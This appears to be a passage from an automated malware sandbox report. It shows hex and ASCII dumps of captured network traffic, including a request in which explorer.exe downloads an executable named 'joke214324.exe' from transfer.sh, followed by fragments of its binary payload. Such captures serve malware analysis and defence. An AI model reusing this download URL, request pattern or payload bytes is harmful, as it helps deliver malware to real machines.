                                                                                                                                  2022-01-11 22:39:05 UTC1682INData Raw: 18 c6 85 6e f0 ff ff 40 c6 85 6f f0 ff ff 00 c6 85 70 f0 ff ff 10 c6 85 71 f0 ff ff 16 c6 85 72 f0 ff ff 40 c6 85 73 f0 ff ff 00 c6 85 74 f0 ff ff 28 c6 85 75 f0 ff ff 18 c6 85 76 f0 ff ff 40 c6 85 77 f0 ff ff 00 c6 85 78 f0 ff ff 18 c6 85 79 f0 ff ff 18 c6 85 7a f0 ff ff 40 c6 85 7b f0 ff ff 00 c6 85 7c f0 ff ff 00 c6 85 7d f0 ff ff 18 c6 85 7e f0 ff ff 40 c6 85 7f f0 ff ff 00 c6 85 80 f0 ff ff f0 c6 85 81 f0 ff ff 17 c6 85 82 f0 ff ff 40 c6 85 83 f0 ff ff 00 c6 85 84 f0 ff ff e0 c6 85 85 f0 ff ff 17 c6 85 86 f0 ff ff 40 c6 85 87 f0 ff ff 00 c6 85 88 f0 ff ff d0 c6 85 89 f0 ff ff 17 c6 85 8a f0 ff ff 40 c6 85 8b f0 ff ff 00 c6 85 8c f0 ff ff c0 c6 85 8d f0 ff ff 17 c6 85 8e f0 ff ff 40 c6 85 8f f0 ff ff 00 c6 85 90 f0 ff ff b0 c6 85 91 f0 ff ff 17 c6 85
                                                                                                                                  Data Ascii: n@opqr@st(uv@wxyz@{|}~@@@@@
                                                                                                                                  2022-01-11 22:39:05 UTC1698INData Raw: f9 ff ff e8 c6 85 a3 f9 ff ff 16 c6 85 a4 f9 ff ff 6a c6 85 a5 f9 ff ff dd c6 85 a6 f9 ff ff c0 c6 85 a7 f9 ff ff b0 c6 85 a8 f9 ff ff 3e c6 85 a9 f9 ff ff 4d c6 85 aa f9 ff ff b5 c6 85 ab f9 ff ff 1e c6 85 ac f9 ff ff 7e c6 85 ad f9 ff ff d0 c6 85 ae f9 ff ff 18 c6 85 af f9 ff ff be c6 85 b0 f9 ff ff 9b c6 85 b1 f9 ff ff b2 c6 85 b2 f9 ff ff eb c6 85 b3 f9 ff ff c0 c6 85 b4 f9 ff ff 33 c6 85 b5 f9 ff ff 5b c6 85 b6 f9 ff ff d9 c6 85 b7 f9 ff ff 5e c6 85 b8 f9 ff ff 56 c6 85 b9 f9 ff ff ce c6 85 ba f9 ff ff 22 c6 85 bb f9 ff ff 8d c6 85 bc f9 ff ff 61 c6 85 bd f9 ff ff a8 c6 85 be f9 ff ff a9 c6 85 bf f9 ff ff 48 c6 85 c0 f9 ff ff d9 c6 85 c1 f9 ff ff 71 c6 85 c2 f9 ff ff 59 c6 85 c3 f9 ff ff 3e c6 85 c4 f9 ff ff 0c c6 85 c5 f9 ff ff 0b c6 85 c6 f9 ff ff
                                                                                                                                  Data Ascii: j>M~3[^V"aHqY>
                                                                                                                                  2022-01-11 22:39:05 UTC1714INData Raw: 1e 00 00 00 05 00 00 00 29 11 00 00 16 00 00 00 d5 04 00 00 0b 00 00 00 19 00 00 00 05 00 00 00 20 00 00 00 0d 00 00 00 04 00 00 00 18 00 00 00 1d 00 00 00 05 00 00 00 13 00 00 00 0d 00 00 00 1d 27 00 00 0d 00 00 00 40 27 00 00 64 00 00 00 41 27 00 00 65 00 00 00 3f 27 00 00 66 00 00 00 35 27 00 00 67 00 00 00 19 27 00 00 09 00 00 00 45 27 00 00 6a 00 00 00 4d 27 00 00 6b 00 00 00 46 27 00 00 6c 00 00 00 37 27 00 00 6d 00 00 00 1e 27 00 00 0e 00 00 00 51 27 00 00 6e 00 00 00 34 27 00 00 70 00 00 00 14 27 00 00 04 00 00 00 26 27 00 00 16 00 00 00 48 27 00 00 71 00 00 00 28 27 00 00 18 00 00 00 38 27 00 00 73 00 00 00 4f 27 00 00 26 00 00 00 42 27 00 00 74 00 00 00 44 27 00 00 75 00 00 00 43 27 00 00 76 00 00 00 47 27 00 00 77 00 00 00 3a 27 00 00 7b 00 00
                                                                                                                                  Data Ascii: ) '@'dA'e?'f5'g'E'jM'kF'l7'm'Q'n4'p'&'H'q('8'sO'&B'tD'uC'vG'w:'{
                                                                                                                                  2022-01-11 22:39:05 UTC1730INData Raw: 41 75 67 75 73 74 00 00 53 65 70 74 65 6d 62 65 72 00 00 00 4f 63 74 6f 62 65 72 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 41 4d 00 00 50 4d 00 00 4d 4d 2f 64 64 2f 79 79 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 48 48 3a 6d 6d 3a 73 73 00 00 00 00 53 00 75 00 6e 00 00 00 4d 00 6f 00 6e 00 00 00 54 00 75 00 65 00 00 00 57 00 65 00 64 00 00 00 54 00 68 00 75 00 00 00 46 00 72 00 69 00 00 00 53 00 61 00 74 00 00 00 53 00 75 00 6e 00 64 00 61 00 79 00 00 00 00 00 4d 00 6f 00 6e 00 64 00 61 00 79 00 00 00 00 00 54 00 75 00 65 00 73 00 64 00 61 00 79 00 00 00 57 00 65 00 64 00 6e 00 65 00 73 00 64 00 61 00 79 00 00 00 54 00 68 00 75 00 72 00 73 00 64 00 61 00 79 00 00 00 00 00 46 00 72 00 69 00 64
                                                                                                                                  Data Ascii: AugustSeptemberOctoberNovemberDecemberAMPMMM/dd/yydddd, MMMM dd, yyyyHH:mm:ssSunMonTueWedThuFriSatSundayMondayTuesdayWednesdayThursdayFrid
                                                                                                                                  2022-01-11 22:39:05 UTC1746INData Raw: 00 00 00 00 40 e3 ef 3f 00 00 00 00 40 e2 ef 3f 00 00 00 00 40 e1 ef 3f 00 00 00 00 40 e0 ef 3f 00 00 00 00 40 df ef 3f 00 00 00 00 40 de ef 3f 00 00 00 00 40 dd ef 3f 00 00 00 00 40 dc ef 3f 00 00 00 00 40 db ef 3f 00 00 00 00 40 da ef 3f 00 00 00 00 40 d9 ef 3f 00 00 00 00 40 d8 ef 3f 00 00 00 00 40 d7 ef 3f 00 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef
                                                                                                                                  Data Ascii: @?@?@?@?@?@?@?@?@?@?@?@?@?@?@?@?@???????????????
                                                                                                                                  2022-01-11 22:39:05 UTC1762INData Raw: fc 24 02 00 35 25 02 00 50 25 02 00 6d 25 02 00 95 25 02 00 bd 25 02 00 e5 25 02 00 fe 25 02 00 30 26 02 00 6e 26 02 00 8b 26 02 00 a8 26 02 00 c5 26 02 00 e2 26 02 00 11 27 02 00 3b 27 02 00 6f 27 02 00 8c 27 02 00 a9 27 02 00 ce 27 02 00 80 c6 06 00 18 00 00 00 02 80 02 80 00 00 00 00 00 00 00 00 44 98 07 00 18 00 00 00 d0 10 00 00 fe 35 00 00 f0 22 02 00 01 03 00 00 00 30 02 00 8c 96 04 00 00 00 00 00 00 10 00 00 d0 00 00 00 2e 74 65 78 74 24 64 69 00 00 00 00 d0 10 00 00 20 12 02 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 f0 22 02 00 03 05 00 00 2e 74 65 78 74 24 78 00 f3 27 02 00 50 00 00 00 2e 74 65 78 74 24 79 64 00 00 00 00 00 30 02 00 80 96 04 00 2e 37 6d 35 31 32 71 77 00 00 00 00 80 c6 06 00 0c 00 00 00 2e 37 6d 35 31 32 71 77 24 78 00 00 00 d0 06
                                                                                                                                  Data Ascii: $5%P%m%%%%%0&n&&&&&';'o''''D5"0.text$di .text$mn".text$x'P.text$yd0.7m512qw.7m512qw$x
                                                                                                                                  2022-01-11 22:39:05 UTC1778INData Raw: 10 58 51 65 08 6a 1a 53 0b 7a 58 33 10 61 3f 43 69 64 7e 42 0d 6e 39 36 33 6e 47 59 79 6b 1f 4e 30 6e 2b 4e 5d 58 1e 73 06 45 2a 4a 0e 46 3b 00 10 43 77 55 14 54 3f 30 29 48 65 48 2e 50 1e 41 37 71 19 52 53 50 39 59 3c 54 35 55 50 52 1d 45 2b 4d 31 71 7c 38 18 30 28 58 34 65 18 6a 03 53 0a 7a 72 33 2e 61 3f 43 6a 64 1a 42 19 6e 1b 36 30 6e 22 59 7d 6b 04 4e 31 6e 00 4e 0c 58 05 73 07 45 2a 4a 12 46 20 00 17 43 7e 55 1c 54 02 30 12 48 6a 48 08 50 0a 41 37 71 22 52 28 50 60 59 3f 54 00 55 3b 52 04 45 2a 4d 44 71 79 38 3f 30 28 58 0e 65 59 6a 06 53 33 7a 62 33 22 61 24 43 51 64 0a 42 0d 6e 1c 36 08 6e 18 59 3c 6b 04 4e 31 6e 00 4e 4d 58 19 73 3e 45 3a 4a 38 46 3f 00 17 43 71 55 10 54 27 30 29 48 5f 48 32 50 18 41 0f 71 46 52 02 50 3a 59 07 54 35 55 01 52 06
                                                                                                                                  Data Ascii: XQejSzX3a?Cid~Bn963nGYykN0n+N]XsE*JF;CwUT?0)HeH.PA7qRSP9Y<T5UPRE+M1q|80(X4ejSzr3.a?CjdBn60n"Y}kN1nNXsE*JF C~UT0HjHPA7q"R(P`Y?TU;RE*MDqy8?0(XeYjS3zb3"a$CQdBn6nY<kN1nNMXs>E:J8F?CqUT'0)H_H2PAqFRP:YT5UR
                                                                                                                                  2022-01-11 22:39:05 UTC1794INData Raw: 36 4e 4d 42 74 7e 6a 36 51 6e 75 59 43 64 6f 4b 12 6e 47 4f 22 68 74 73 72 45 6d 4a 6a 46 57 11 76 38 3b 55 64 50 54 5f aa 49 32 4e 48 8e 76 67 78 7b aa 52 60 7a 50 59 67 44 58 55 69 52 74 45 47 42 76 74 0d 38 74 31 69 68 61 65 7a 6a 73 53 75 7a 35 22 44 1a 5e 43 30 60 4e 2d 99 6f 6a 30 5b b0 70 7f 5a 61 b1 4e 54 44 47 4e 38 48 76 73 64 45 6d 4a 79 49 57 05 34 43 36 54 7f 64 55 30 5e 48 32 48 5e 50 73 50 6c 0a 79 52 66 54 53 36 8b 55 58 53 63 8c 71 63 5e 47 a8 71 4b 12 74 30 73 48 63 65 6c 6a 73 53 66 75 35 36 06 61 53 42 2b 54 4f 42 63 6e 6a 36 4d 6e 75 48 4e 10 62 4e 52 6a 44 21 dd 59 76 75 6e 9b 68 6c 60 4c 89 00 72 69 36 55 65 44 57 30 48 48 32 48 4d 5f 73 44 2e 71 74 53 7d 60 52 59 70 54 58 55 75 52 74 54 4a 36 7b 71 4d 3c 77 5f 9c 59 63 63 66 b4 76
                                                                                                                                  Data Ascii: 6NMBt~j6QnuYCdoKnGO"htsrEmJjFWv8;UdPT_I2NHvgx{R`zPYgDXUiRtEGBvt8t1ihaezjsSuz5"D^C0`N-oj0[pZaNTDGN8HvsdEmJyIW4C6TdU0^H2H^PsPlyRfTS6UXScqc^GqKt0sHceljsSfu56aSB+TOBcnj6MnuHNbNRjD!Yvunhl`Lri6UeDW0HH2HM_sD.qtS}`RYpTXUuRtTJ6{qM<w_Yccfv
                                                                                                                                  2022-01-11 22:39:05 UTC1810INData Raw: 52 6f 6f 70 39 58 7c 5f 47 4d 6f c6 2c 46 57 02 69 ce 09 55 64 55 72 e0 85 48 32 4c 6a 69 73 41 64 02 4e 52 66 5a 44 36 51 55 58 5f 6e 45 2c 4e 4f 4b f8 18 7f a7 5e 30 61 68 61 65 47 6a 73 53 2e 7a 35 22 44 1a 62 43 30 60 47 54 7e 45 72 30 56 f4 79 5a 23 07 6e 4e 54 66 28 6a 39 58 7c 5f 66 52 47 4d 61 1e 5c 07 72 cd 5f 67 86 42 7d 30 5b 78 37 48 c0 50 73 41 26 71 74 43 18 2a 50 59 6c 7c 60 54 69 58 51 2a 71 4c 76 7b 47 4a e7 3e 72 28 11 a2 62 6a 03 2d 74 7a 35 39 6e 7f 53 43 3a 4c 61 43 75 68 18 eb 5f 6e 05 2b 0d 64 6f 3e 2c 73 47 4e 33 70 68 73 64 4f 45 67 77 46 51 28 50 43 36 7e 41 52 48 3a 27 6a 33 48 44 5b 75 5e 1b 1e 56 53 66 56 3c 5e 0a 0f 40 7d 53 53 74 4f 44 4f 5a 7d 45 1b 74 30 72 58 63 65 35 2a 29 5f 4c 7c 5a 08 47 61 59 2c 0c 65 4d 48 7d 44 6a
                                                                                                                                  Data Ascii: Roop9X|_GMo,FWiUdUrH2LjisAdNRfZD6QUX_nE,NOK^0ahaeGjsS.z5"DbC0`GT~Er0VyZ#nNTf(j9X|_fRGMa\r_gB}0[x7HPsA&qtC*PYl|`TiXQ*qLv{GJ>r(bj-tz59nSC:LaCuh_n+do>,sGN3phsdOEgwFQ(PC6~ARH:'j3HD[u^VSfV<^@}SStODOZ}Et0rXce5*)_L|ZGaY,eMH}Dj
                                                                                                                                  2022-01-11 22:39:05 UTC1826INData Raw: 74 43 36 55 f2 54 6f 11 f2 4e c3 49 96 ee 73 41 6e 71 e2 52 7b 68 e2 5f 95 55 fc 95 69 52 74 45 de 4d 9d 45 ff 3e 87 31 76 99 63 65 6c 6a e5 53 64 3b 6b 35 b5 60 07 81 30 64 4d 42 e3 6e 41 1a 0f 68 86 58 ac a9 6f 4e 52 6e d4 4e 8a 59 39 73 97 44 12 0e 76 46 57 00 e5 5b ad 66 b8 54 a2 31 68 74 32 48 42 50 f5 59 19 42 7e 52 93 51 db 1d 66 54 58 55 ea 52 38 47 a8 4d 83 70 c3 7c 74 30 72 58 e0 65 00 68 a0 55 9f 7b ae 77 46 61 53 43 b6 6c 16 46 af 68 9d 37 f2 2a 75 59 4c 6b e9 46 31 6a aa 4a ce 59 da 37 64 45 6d 4a f0 4e 57 07 ae 45 ce 54 d0 10 57 30 48 48 b4 40 4a 57 9e 45 96 70 54 6e 66 50 50 59 e0 4c 2f 66 63 52 8d 44 f5 09 76 71 4d 38 f2 38 29 5c b9 63 95 6b b6 17 69 7a 35 33 c0 69 30 47 dd 60 b4 43 bb 2a 6a 36 51 6e f3 51 4c 6c b5 48 a8 6f 91 0a 39 58 76
                                                                                                                                  Data Ascii: tC6UToNIsAnqR{h_UiRtEME>1vceljSd;k5`0dMBnAhXoNRnNY9sDvFW[fT1ht2HBPYB~RQfTXUR8GMp|t0rXehU{wFaSClFh7*uYLkF1jJY7dEmJNWETW0HH@JWEpTnfPPYL/fcRDvqM88)\ckiz53i0G`C*j6QnQLlHo9Xv
                                                                                                                                  2022-01-11 22:39:05 UTC1842INData Raw: 0e 71 0d 52 06 50 2a 59 06 54 23 55 09 52 08 45 28 4d 0b 71 2d 38 0a 30 12 58 63 65 6c 6a 62 53 05 63 35 33 46 61 a0 42 5c 7d 4d 42 75 6e 49 34 3d 77 75 59 4c 6b 48 4c 3e 77 47 4e 3d 58 2b 71 08 5c 58 4a a1 56 47 00 5a 52 26 55 35 45 47 30 3c 59 22 48 d5 41 14 41 c2 60 eb 52 ca 42 f1 59 ca 46 7a 57 ad 40 28 47 93 5e 2a 73 ad 2b 28 32 97 4b 3f 67 86 79 2f 51 86 69 69 31 b2 72 0f 41 c9 77 1c 43 bd 7b cb 36 9f 7b e0 58 e0 79 fa 4f 5a 79 f2 4f 95 4a 11 73 c8 57 d4 4b da 54 62 00 06 5b c5 54 c2 4d f6 30 ee 51 c0 49 97 49 81 40 c2 63 86 53 4e 4a a2 58 48 4e 55 57 0e 48 39 47 2f 57 23 73 30 23 2d 32 dc 43 3e 67 be 71 2f 51 74 66 00 33 6c 7c f2 43 1f 79 10 40 d9 7c 3f 34 09 73 c6 5b 14 76 3e 4f 85 7e 76 4d 35 47 43 73 7f 5a 6d 4a 76 19 08 53 00 22 42 3c 07 15 25
                                                                                                                                  Data Ascii: qRP*YT#URE(Mq-80XceljbSc53FaB\}MBunI4=wuYLkHL>wGN=X+q\XJVGZR&U5EG0<Y"HAA`RBYFzW@(G^*s+(2K?gy/Qii1rAwC{6{XyOZyOJsWKTb[TM0QII@cSNJXHNUWH9G/W#s0#-2C>gq/Qtf3l|Cy@|?4s[v>O~vM5GCsZmJvS"B<%
                                                                                                                                  2022-01-11 22:39:05 UTC1858INData Raw: 05 2c 15 32 22 56 00 55 0a 2c 63 37 09 0b 17 1e 08 09 41 56 34 2e 35 00 5f 0a 39 27 0d 1a 6a 79 21 0b 07 38 38 02 00 20 11 01 29 3a 5c 20 02 73 0d 33 6d 2d 13 32 08 4e 1b 34 36 26 01 20 08 73 3a 2d 53 3c 27 1e 1c 16 07 1f 10 3d 11 50 03 31 09 23 58 3e 08 21 10 2c 20 2f 10 01 2b 5c 01 41 05 58 21 17 29 12 73 36 07 1e 7c 57 3e 61 20 37 51 16 39 0b 11 16 6a 58 18 00 11 3c 34 6b 1c 3a 33 1c 33 07 57 3c 13 0b 64 37 02 3d 3f 28 33 65 0c 43 64 30 03 31 2f 30 05 2d 41 3b 23 37 16 03 01 09 74 1d 14 34 35 2b 24 2d 58 31 00 21 04 29 29 34 76 1e 21 5c 35 42 00 39 1a 65 25 04 1a 27 00 1b 59 5a 3c 04 12 31 42 05 34 42 21 01 2b 44 23 0f 0c 59 0a 19 00 23 10 0f 34 2b 0f 6c 35 1b 05 37 2c 38 04 27 2e 00 20 2c 75 3d 05 26 16 42 3a 29 4b 48 25 35 07 1e 25 14 0d 52 29 20 35
                                                                                                                                  Data Ascii: ,2"VU,c7AV4.5_9'jy!88 ):\ s3m-2N46& s:-S<'=P1#X>!, /+\AX!)s6|W>a 7Q9jX<4k:33W<d7=?(3eCd01/0-A;#7t45+$-X1!))4v!\5B9e%'YZ<1B4B!+D#Y#4+l57,8'. ,u=&B:)KH%5%R) 5
                                                                                                                                  2022-01-11 22:39:05 UTC1874INData Raw: 1a 13 5a 5d 7b 43 62 6d 00 46 6d 27 1b 0d 05 52 38 00 12 64 6e 3e 3b 08 7f 56 65 6e 4a 2c 17 1d 00 24 01 25 18 23 6a 22 0d 26 45 77 5b 6a 5a 3a 45 42 0e 29 31 23 16 2c 0c 1d 0d 72 1e 3d 3c 37 15 69 7a 20 1b 3c 4e 36 2b 25 13 1c 2c 4b 59 5d 1b 3b 11 0a 1f 05 15 27 44 19 5a 5e 7c 00 20 2e 1e 12 7c 60 55 03 0b 58 38 08 10 2a 38 3d 0a 3c 21 07 28 20 04 7a 47 5d 54 67 53 47 7c 66 77 3c 15 30 45 30 09 36 3b 49 01 2c 57 26 36 39 07 38 4e 07 11 20 15 39 3f 37 5b 76 69 7b 59 7c 44 6b 78 6f 56 1f 2c 55 11 0d 50 15 1a 24 1c 1a 1f 3a 0a 1b 41 5a 29 0f 7d 22 40 14 6f 6d 4b 63 60 16 71 52 01 2b 39 18 1b 07 3c 08 28 6e 41 35 1a 1d 17 78 4f 3f 04 28 6d 73 17 2b 53 38 05 27 7a 5d 21 2b 40 27 31 3f 15 35 43 12 1b 3f 5c 31 23 34 48 22 6a 77 57 5f 7e 65 68 6d 56 4d 3e 5d 17
                                                                                                                                  Data Ascii: Z]{CbmFm'R8dn>;VenJ,$%#j"&Ew[jZ:EB)1#,r=<7iz <N6+%,KY];'DZ^| .|`UX8*8=<!( zG]TgSG|fw<0E06;I,W&698N 9?7[vi{Y|DkxoV,UP$:AZ)}"@omKc`qR+9<(nA5xO?(ms+S8'z]!+@'1?5C?\1#4H"jwW_~ehmVM>]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.549888144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:39:06 UTC1884OUTGET /get/2w2PAQ/joke214324.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: transfer.sh
                                                                                                                                  2022-01-11 22:39:07 UTC1884INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.14.2
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:07 GMT
                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                  Content-Length: 1335968
                                                                                                                                  Connection: close
                                                                                                                                  Content-Disposition: attachment; filename="joke214324.exe"
                                                                                                                                  Retry-After: Tue, 11 Jan 2022 23:39:08 GMT
                                                                                                                                  X-Made-With: <3 by DutchCoders
                                                                                                                                  X-Ratelimit-Key: 127.0.0.1,102.129.143.64,102.129.143.64
                                                                                                                                  X-Ratelimit-Limit: 10
                                                                                                                                  X-Ratelimit-Rate: 600
                                                                                                                                  X-Ratelimit-Remaining: 8
                                                                                                                                  X-Ratelimit-Reset: 1641940748
                                                                                                                                  X-Remaining-Days: n/a
                                                                                                                                  X-Remaining-Downloads: n/a
                                                                                                                                  X-Served-By: Proudly served by DutchCoders
                                                                                                                                  2022-01-11 22:39:07 UTC1885INData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZog':(332fC'B{b+Rd:Q
                                                                                                                                  2022-01-11 22:39:07 UTC1900INData Raw: f3 f3 f3 f3 ff ff ff ff ff f2 f2 f2 ff ff ff f4 f3 f2 f2 f2 f3 f4 ff ff ff ff ff f3 bc bc f1 f2 f4 ff ff ff f4 f2 f1 bc bc f3 f4 ff ff ff ff f4 f3 f3 f3 f4 f4 f4 f4 f4 f2 f3 f3 f4 f3 f3 f3 f3 f3 f3 f3 f3 f3 ff ff ff ff f2 f2 f2 ff ff ff f4 f4 f3 f2 f2 f2 f3 f4 ff ff ff ff f3 bc bc f1 f2 f4 ff ff ff ff f4 f2 bc bc f2 f4 ff ff ff ff f4 f4 f3 f2 f3 f4 f4 ff ff f4 f3 f3 f3 f4 f3 f3 f3 f3 f3 f3 f3 f3 ff ff ff ff f2 f2 f2 ff ff ff f4 f4 f3 f2 f2 f2 f3 f4 ff ff ff ff f3 bc bc f1 f2 f4 ff ff ff ff f4 f2 bc bc f2 f4 ff ff ff ff f4 f4 f3 f2 f3 f4 f4 ff ff f4 f3 f3 f3 f4 f3 f3 f3 f3 f4 f4 f3 f3 ff ff ff f4 f2 f1 f2 f3 f4 f4 f4 f4 f4 f3 f2 f1 f1 f3 f4 ff ff ff ff bc 07 07 f2 f4 ff ff ff ff ff f4 f2 f2 f2 f4 ff ff ff ff f4 f4 f3 f3 f2 f3 f4 ff ff ff f4 f3 f3 f3 f3 f3
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:39:07 UTC1916INData Raw: 01 09 0e 01 00 05 07 07 01 09 0c 00 1d 0b 03 09 02 17 16 11 00 05 0a 07 02 07 09 07 19 03 02 0e 01 07 01 0b 01 05 00 01 07 0b 09 22 13 03 09 13 22 13 07 07 03 0b 0a 08 4d 06 03 08 6d 45 40 06 01 07 0b 05 1d 0e 00 00 0f 02 02 03 20 a0 0f 00 01 01 00 0e 03 01 06 0f 05 05 04 05 03 14 05 14 14 07 05 00 06 04 06 04 08 14 07 01 03 05 00 00 0c 0b 09 0d 0a 01 0c 13 07 02 01 02 11 18 11 28 10 03 9f ae ae 60 9a e6 02 03 01 06 08 10 00 0c 00 08 04 02 03 03 0f 06 00 0b 01 3b 0f 1a 14 01 14 0c 00 01 07 1d 06 00 05 0c 07 07 0e 02 0b 04 06 04 15 10 00 01 01 00 01 0b 01 0a 09 14 2b 09 01 0c 01 07 00 01 02 05 01 02 03 14 03 02 09 0c 02 00 0b 01 12 06 04 20 5a 34 0c 03 29 16 07 63 01 07 03 03 02 05 18 04 03 00 07 09 59 6f 61 16 04 02 02 00 07 01 07 02 08 03 03 01 03 0d 04
                                                                                                                                  Data Ascii: ""MmE@ (`;+ Z4)cYoa
                                                                                                                                  2022-01-11 22:39:07 UTC1932INData Raw: 01 1a 09 01 0a 0a 01 00 01 05 05 07 01 0a 01 02 09 09 01 0e 27 02 01 01 00 06 07 07 13 4b 07 01 0b 08 06 19 40 1e 2c 1e 16 12 03 0b 01 01 01 03 01 01 09 4b 09 09 01 00 03 06 00 1d 03 02 01 06 01 01 03 03 06 15 40 55 06 08 00 05 03 01 03 10 10 0d 05 05 0a 00 05 0f 02 12 00 03 00 00 12 05 00 0d 00 00 00 00 04 04 04 04 0b 00 00 06 04 10 3d 15 3d 15 20 15 00 00 06 08 0f 02 00 51 14 0a 07 05 03 00 0b 00 16 07 00 02 01 03 00 00 02 02 12 4c 4d 29 6f 6f b2 21 00 23 08 0a 07 00 0e 02 04 0b 14 0a 07 13 09 0a 01 17 06 07 0a 01 07 09 02 03 01 01 03 05 09 02 41 00 0c 02 13 22 13 95 0b 0a 03 19 4e 26 17 6a 2a 00 02 05 01 27 0b 02 0c 1c 0a 0e 01 02 41 00 04 03 02 0b 21 01 08 04 06 04 06 05 20 8c 57 61 0d 04 02 03 00 0c 01 20 04 06 04 04 12 17 15 06 06 05 06 0f 01 06 06
                                                                                                                                  Data Ascii: 'K@,K@U== QLM)oo!#A"N&j*'A! Wa
                                                                                                                                  2022-01-11 22:39:07 UTC1948INData Raw: 21 10 21 13 13 21 21 12 21 13 21 21 21 20 21 21 21 1e 16 21 10 13 21 1e 16 1e 16 20 1e 21 21 13 21 10 16 1e 16 19 1d 16 11 21 13 21 21 1e 20 16 1e 16 1e 21 13 10 21 16 1e 21 21 21 20 21 21 21 13 21 12 21 21 21 21 12 21 13 21 21 21 20 21 21 21 1e 16 21 10 13 21 1e 16 1e 16 20 1e 21 21 13 21 10 16 1e 16 19 1d 16 11 21 13 21 21 1e 20 16 1e 16 1e 21 13 10 21 16 1e 21 21 21 20 21 21 21 13 21 12 21 21 12 09 21 1e 21 21 16 13 21 21 1c 21 21 1e 16 1e 16 1e 16 1e 21 13 21 13 21 21 1e 21 1e 21 21 21 21 21 21 1e 21 1e 21 21 13 21 11 21 1e 16 1e 16 1e 16 1e 21 21 1c 21 21 13 16 21 21 1e 21 09 12 12 09 21 1e 21 21 16 13 21 21 1c 21 21 1e 16 1e 16 1e 16 1e 21 13 21 13 21 21 1e 21 1e 21 21 21 21 21 21 1e 21 1e 21 21 13 21 11 21 1e 16 1e 16 1e 16 1e 21 21 1c 21 21 13 16
                                                                                                                                  Data Ascii: !!!!!!!! !!!!! !!!!!! !!!!! !!!!!!!!!!!! !!!!! !!!!!! !!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                                                                  2022-01-11 22:39:07 UTC1964INData Raw: 02 01 00 03 02 02 03 03 02 03 02 02 02 02 02 02 02 01 03 02 02 02 02 02 03 02 02 02 02 02 02 05 02 00 04 02 02 02 02 01 01 03 03 02 02 03 03 01 02 02 02 02 01 03 02 03 02 03 02 03 02 02 02 03 02 04 02 02 02 01 02 02 03 02 02 01 04 02 01 02 03 02 02 02 01 02 03 02 04 02 02 03 02 02 04 02 02 03 02 02 02 02 02 02 02 02 03 00 04 02 01 02 02 02 02 01 00 03 02 02 03 03 02 03 02 02 02 02 02 02 02 01 03 02 02 02 02 02 03 02 02 02 02 02 02 05 02 00 04 02 02 02 02 01 01 03 03 02 02 03 03 01 02 02 02 02 01 03 02 02 02 02 02 02 02 02 01 02 02 02 03 01 05 01 02 03 02 01 02 01 02 03 02 01 02 02 02 03 02 01 02 01 04 04 02 02 03 01 02 04 01 02 02 02 02 02 03 02 02 00 02 02 02 02 02 02 02 03 03 02 02 02 02 01 01 03 02 02 03 02 02 02 01 02 02 03 02 02 01 02 03 02 03 04 02
                                                                                                                                  Data Ascii:
